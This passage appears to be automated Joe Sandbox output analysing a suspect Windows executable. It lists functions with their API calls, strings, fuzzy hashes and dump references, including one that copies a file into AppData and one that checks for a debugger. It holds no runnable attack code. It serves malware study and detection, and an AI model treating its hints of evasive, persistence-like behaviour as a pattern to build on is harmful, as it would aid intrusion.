                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                    • String ID:
                                    • API String ID: 2744216297-0
                                    • Opcode ID: 7750f9bab5b79f1e68b77aa684b8335d89a78667acd90105233bb33d16c9b24a
                                    • Instruction ID: 04829d214d117aed3dd2480091a040500ddd42b3f181acbe8c44d3c1e21a26b7
                                    • Opcode Fuzzy Hash: 7750f9bab5b79f1e68b77aa684b8335d89a78667acd90105233bb33d16c9b24a
                                    • Instruction Fuzzy Hash: 4AF0C936551229BFDF223F99DC09D9A7F26FF193B1F044121FA1CD5231D63298209B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085864B Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 348COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 00858652
                                      • Part of subcall function 008570FE: std::_Lockit::_Lockit.LIBCPMT ref: 0085710F
                                      • Part of subcall function 008570FE: int.LIBCPMT ref: 00857126
                                      • Part of subcall function 008570FE: std::_Lockit::~_Lockit.LIBCPMT ref: 00857180
                                    • _Find_elem.LIBCPMT ref: 00858864
                                    Strings
                                    • 0123456789ABCDEFabcdef-+Xx, xrefs: 008586BA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                    • API String ID: 2124549159-2799312399
                                    • Opcode ID: 7f70d490aa52efc99ebad9e81eedc8c31b143df9fdb8666e4106f74ef8ee7c95
                                    • Instruction ID: 3adebe1b75dbefbeef65c3db7ca6aabb60641aa8b89c6dd1a2f0f6a0359e5435
                                    • Opcode Fuzzy Hash: 7f70d490aa52efc99ebad9e81eedc8c31b143df9fdb8666e4106f74ef8ee7c95
                                    • Instruction Fuzzy Hash: FBD16C31D04298DADF16DBA8C4547ECBBB2FF55301F68409ADC85BB282DF349949CB12
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008604A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 347COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 008604AA
                                      • Part of subcall function 0085C8C4: std::_Lockit::_Lockit.LIBCPMT ref: 0085C8D5
                                      • Part of subcall function 0085C8C4: int.LIBCPMT ref: 0085C8EC
                                      • Part of subcall function 0085C8C4: std::_Lockit::~_Lockit.LIBCPMT ref: 0085C946
                                    • _Find_elem.LIBCPMT ref: 008606FA
                                    Strings
                                    • 0123456789ABCDEFabcdef-+Xx, xrefs: 00860521
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                    • API String ID: 2124549159-2799312399
                                    • Opcode ID: 590cdc3ee2a70ccba5d60d1330a1beb72dcf644561eeacfca21b97ccb4eac2ef
                                    • Instruction ID: 45ffa837fd2e3986bf7e4ec6f974db29391600641029d46c47243c21d9f89f95
                                    • Opcode Fuzzy Hash: 590cdc3ee2a70ccba5d60d1330a1beb72dcf644561eeacfca21b97ccb4eac2ef
                                    • Instruction Fuzzy Hash: 3BD1D530D042688EDF25DBA8C8557EEBBB2FF50314F154099E889EB282DB749C85CF55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008608C3 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 347COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 008608CD
                                      • Part of subcall function 0085C959: std::_Lockit::_Lockit.LIBCPMT ref: 0085C96A
                                      • Part of subcall function 0085C959: int.LIBCPMT ref: 0085C981
                                      • Part of subcall function 0085C959: std::_Lockit::~_Lockit.LIBCPMT ref: 0085C9DB
                                    • _Find_elem.LIBCPMT ref: 00860B1D
                                    Strings
                                    • 0123456789ABCDEFabcdef-+Xx, xrefs: 00860944
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                    • API String ID: 2124549159-2799312399
                                    • Opcode ID: 0e75a99e94b86aea19558ea23da17bc7133daf24bc4e826ac5d5f0c91892730e
                                    • Instruction ID: 603c8f8324d1a648aab2ecad7fec7e0fd2df02bc8d2d82060adc0372cefde510
                                    • Opcode Fuzzy Hash: 0e75a99e94b86aea19558ea23da17bc7133daf24bc4e826ac5d5f0c91892730e
                                    • Instruction Fuzzy Hash: 4FD1A130D042688EDF25DBA8C8957AEBBB2FF05314F158199D889EB283DB344C85CF59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0081D397 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 336fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0082DF41: _Deallocate.LIBCONCRT ref: 0082DF50
                                      • Part of subcall function 0086DB91: EnterCriticalSection.KERNEL32(008B3CAC,?,74714EE0,?,0081416B,008B54D0,00000000), ref: 0086DB9C
                                      • Part of subcall function 0086DB91: LeaveCriticalSection.KERNEL32(008B3CAC,?,0081416B,008B54D0,00000000), ref: 0086DBD9
                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 0081D6D8
                                      • Part of subcall function 0086DB47: EnterCriticalSection.KERNEL32(008B3CAC,69494B7C,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB51
                                      • Part of subcall function 0086DB47: LeaveCriticalSection.KERNEL32(008B3CAC,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB84
                                      • Part of subcall function 0086DB47: RtlWakeAllConditionVariable.NTDLL ref: 0086DBFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                    • String ID: APPDATA$ro\CA\Wr.
                                    • API String ID: 265086031-4119792198
                                    • Opcode ID: ec3d33fb7edaf2be750228cc8751567cea539ba14b8e5b8a7dea0aaa43e62350
                                    • Instruction ID: 20242113eee3b21c08d930186234b39112558d249a0d12f11e68e007f16bcbbf
                                    • Opcode Fuzzy Hash: ec3d33fb7edaf2be750228cc8751567cea539ba14b8e5b8a7dea0aaa43e62350
                                    • Instruction Fuzzy Hash: 5CE19C31D00259DEDF15EBA8D951BDDBBB4FF15300F2080A9E546BB282DB745B88CB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0084DA52 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 214COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: %z:%d$column%d
                                    • API String ID: 4218353326-1386510365
                                    • Opcode ID: 7f20c81ccf66c9241df6cc7197ffb8773617745ac179ec567cd5e1afc20f792e
                                    • Instruction ID: 5b948f15992ba2d7e288c728c5aaf5b6345edaca9fa2fdd465c7d9a56bbec37f
                                    • Opcode Fuzzy Hash: 7f20c81ccf66c9241df6cc7197ffb8773617745ac179ec567cd5e1afc20f792e
                                    • Instruction Fuzzy Hash: 18715AB1A083059FD710DF28C491A2ABBE5FF89354F14456DF889DB352EB70D905CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0086CA1F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                    • API String ID: 3732870572-1956417402
                                    • Opcode ID: a39c4d5d0c4fb92687ca24b31c471db37be01ee22958cbc046328cd17f7ade5c
                                    • Instruction ID: f0694f125f0920f02965936b0918539d799f1f567f30d3c46fdaa0d980ac7c41
                                    • Opcode Fuzzy Hash: a39c4d5d0c4fb92687ca24b31c471db37be01ee22958cbc046328cd17f7ade5c
                                    • Instruction Fuzzy Hash: 0351E5B0B042AD9ACF25CEAC88827BE7FB6FF45321F16445AE4C1D7341D6748941CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0083D4AF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %.2x
                                    • API String ID: 0-936724101
                                    • Opcode ID: 76730b43934394a8c1496c7e0eef881f9f6b6983d4c73d14b4a6d43b0ab8ac0a
                                    • Instruction ID: 399ab7370b7fe3bad7acd359f9f44c74071cace9d518b5d7e85ee78d4a667a50
                                    • Opcode Fuzzy Hash: 76730b43934394a8c1496c7e0eef881f9f6b6983d4c73d14b4a6d43b0ab8ac0a
                                    • Instruction Fuzzy Hash: FC51BF71A04B42EFDB14CF28D481B60BBA4FF59310F14816AE949CBB46E374E551CBE2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0087D249 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: C:\Users\user\Desktop\qRsw2oZH24.exe
                                    • API String ID: 0-318110836
                                    • Opcode ID: b4509b13810be105013d1e419e1f5c04c655cf15c6ed8cab63a2888596fa0584
                                    • Instruction ID: 85313eda8f3ebefd588d88d9f4a59cf45ada6ff45e264e6841cf563c58b82981
                                    • Opcode Fuzzy Hash: b4509b13810be105013d1e419e1f5c04c655cf15c6ed8cab63a2888596fa0584
                                    • Instruction Fuzzy Hash: 15418271A00718ABCB11EB9DD881D9EBBF8FF85314B148166F408E7316E670DA45DB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0086259B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0085B5E6: _Maklocstr.LIBCPMT ref: 0085B606
                                      • Part of subcall function 0085B5E6: _Maklocstr.LIBCPMT ref: 0085B623
                                      • Part of subcall function 0085B5E6: _Maklocstr.LIBCPMT ref: 0085B640
                                      • Part of subcall function 0085B5E6: _Maklocchr.LIBCPMT ref: 0085B652
                                      • Part of subcall function 0085B5E6: _Maklocchr.LIBCPMT ref: 0085B665
                                    • _Mpunct.LIBCPMT ref: 0086262F
                                    • _Mpunct.LIBCPMT ref: 00862649
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Maklocstr$MaklocchrMpunct
                                    • String ID: $+xv
                                    • API String ID: 542472742-1686923651
                                    • Opcode ID: 06cf445687575f17f3de78478c0a4922385d49f1e24fc36cf0e330a06a801afa
                                    • Instruction ID: 8b66e83b6eed84f55fbd982e8367654ad0cbabba991bce698299fa1d434d53af
                                    • Opcode Fuzzy Hash: 06cf445687575f17f3de78478c0a4922385d49f1e24fc36cf0e330a06a801afa
                                    • Instruction Fuzzy Hash: 9721B2B1904A526ED725DF78C49073BBEF8FF18300F05065AE459C7A41D774EA05CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00858AA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: H_prolog3_
                                    • String ID: false$true
                                    • API String ID: 2427045233-2658103896
                                    • Opcode ID: 31d0214f2fa3aa9322ea3c65380e958204125aabf5194d045a19ea32638c0072
                                    • Instruction ID: dcfc138ee3394d32d8337a6c93d10c112dde4650fa8ed32f1ff1c14e27b802a7
                                    • Opcode Fuzzy Hash: 31d0214f2fa3aa9322ea3c65380e958204125aabf5194d045a19ea32638c0072
                                    • Instruction Fuzzy Hash: FA117FB59447449ECB25EFB8D441B9AB7F4FB15300F04891BF5A5D7341EA70E5088B52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0083C2D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: %!.15g$%lld
                                    • API String ID: 4218353326-2983862324
                                    • Opcode ID: 4ce5d6e6fa0ed860914d1fb58301980cc5b059265475a4dd5008ab1b84b953a0
                                    • Instruction ID: 59f8770314020b2f307a1e80e0a7094a4c58dfb99990f8cad2f34805acc3e5cd
                                    • Opcode Fuzzy Hash: 4ce5d6e6fa0ed860914d1fb58301980cc5b059265475a4dd5008ab1b84b953a0
                                    • Instruction Fuzzy Hash: FAF02D71604B04AAD3305F9D9C01A17B7E8FF8AB10F00471EF589D2682EA60A94547F6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0086D941 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00814317: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,00000000,8007000E,?,?,?,008B06B0,0082F491,?,0082E301,80070057,?,0082F491,00000001), ref: 0081431D
                                      • Part of subcall function 00814317: GetLastError.KERNEL32(?,00000000,00000000,00000000,8007000E,?,?,?,008B06B0,0082F491,?,0082E301,80070057,?,0082F491,00000001), ref: 00814327
                                    • IsDebuggerPresent.KERNEL32(?,?,?,00811130), ref: 0086D974
                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00811130), ref: 0086D983
                                    Strings
                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0086D97E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                    • API String ID: 3511171328-631824599
                                    • Opcode ID: f21e2bbacd8bcbc73a1e7f8c5285228572e6c1e146bd99189583aff3c5f8d4a0
                                    • Instruction ID: 5edca0ab0bfa7759843f0663ce238ebbfe35a0234f534ee2e81bad47b1a6a08d
                                    • Opcode Fuzzy Hash: f21e2bbacd8bcbc73a1e7f8c5285228572e6c1e146bd99189583aff3c5f8d4a0
                                    • Instruction Fuzzy Hash: 5AE06D706007118BC720AF69E9053867BE8FF04704F08891DE4A6C6640D7B4D488CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%